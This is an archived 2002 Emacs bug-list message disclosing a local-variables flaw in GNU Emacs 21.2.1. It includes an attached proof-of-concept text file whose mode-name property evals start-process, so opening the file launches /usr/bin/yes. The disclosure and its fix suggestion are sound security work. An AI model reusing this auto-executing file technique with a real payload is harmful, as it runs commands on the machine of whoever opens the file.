From mboxrd@z Thu Jan 1 00:00:00 1970 Path: main.gmane.org!not-for-mail From: Georgi Guninski Newsgroups: gmane.emacs.bugs Subject: security problem in emacs Date: Tue, 31 Dec 2002 14:17:15 +0200 Sender: bug-gnu-emacs-bounces+gnu-bug-gnu-emacs=m.gmane.org@gnu.org Message-ID: <3E118ACB.5040907@guninski.com> Reply-To: guninski@guninski.com NNTP-Posting-Host: main.gmane.org Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="------------060804000904030003020001" X-Trace: main.gmane.org 1041337081 23632 80.91.224.249 (31 Dec 2002 12:18:01 GMT) X-Complaints-To: usenet@main.gmane.org NNTP-Posting-Date: Tue, 31 Dec 2002 12:18:01 +0000 (UTC) Return-path: Original-Received: from monty-python.gnu.org ([199.232.76.173]) by main.gmane.org with esmtp (Exim 3.35 #1 (Debian)) id 18TLLL-000691-00 for ; Tue, 31 Dec 2002 13:18:00 +0100 Original-Received: from localhost ([127.0.0.1] helo=monty-python.gnu.org) by monty-python.gnu.org with esmtp (Exim 4.10.13) id 18TLLf-0000YN-03 for gnu-bug-gnu-emacs@m.gmane.org; Tue, 31 Dec 2002 07:18:19 -0500 Original-Received: from list by monty-python.gnu.org with tmda-scanned (Exim 4.10.13) id 18TLLD-0008Ka-00 for bug-gnu-emacs@gnu.org; Tue, 31 Dec 2002 07:17:51 -0500 Original-Received: from mail by monty-python.gnu.org with spam-scanned (Exim 4.10.13) id 18TLKs-0007rE-00 for bug-gnu-emacs@gnu.org; Tue, 31 Dec 2002 07:17:33 -0500 Original-Received: from home.ntrl.net ([194.12.224.34]) by monty-python.gnu.org with esmtp (Exim 4.10.13) id 18TLKq-0007Zr-00 for bug-gnu-emacs@gnu.org; Tue, 31 Dec 2002 07:17:29 -0500 Original-Received: from guninski.com ([194.12.248.247]) by home.ntrl.net (8.9.1/Config) with ESMTP id OAA03729; Tue, 31 Dec 2002 14:16:34 +0200 User-Agent: Mozilla/5.0 (X11; Linux) X-Accept-Language: en-us, en Original-To: bug-gnu-emacs@gnu.org, vendor-sec@lst.de X-MailScanner: Found to be clean X-BeenThere: bug-gnu-emacs@gnu.org X-Mailman-Version: 2.1b5 Precedence: list List-Id: Bug reports for GNU Emacs, the Swiss army knife of text editors List-Help: List-Post: List-Subscribe: , List-Archive: List-Unsubscribe: , Errors-To: bug-gnu-emacs-bounces+gnu-bug-gnu-emacs=m.gmane.org@gnu.org Xref: main.gmane.org gmane.emacs.bugs:4119 X-Report-Spam: http://spam.gmane.org/gmane.emacs.bugs:4119 This is a multi-part message in MIME format. --------------060804000904030003020001 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi, Attached file demonstrates GNU Emacs 21.2.1 starting process if a text file is opened. Just open it with emacs and check for processes "yes". I suggest disabling local variables by default, because probably there are similar bugs of the same nature. All the best in the new year! Georgi --------------060804000904030003020001 Content-Type: text/plain; name="emacs1.emacs" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="emacs1.emacs" /* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */ Emacs better than windoze. ;;; Local Variables: *** ;;; mode: text *** ;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) *** ;;; comment-start: ";;; " *** ;;; comment-end:"***" *** ;;; End: *** --------------060804000904030003020001 Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit _______________________________________________ Bug-gnu-emacs mailing list Bug-gnu-emacs@gnu.org http://mail.gnu.org/mailman/listinfo/bug-gnu-emacs --------------060804000904030003020001--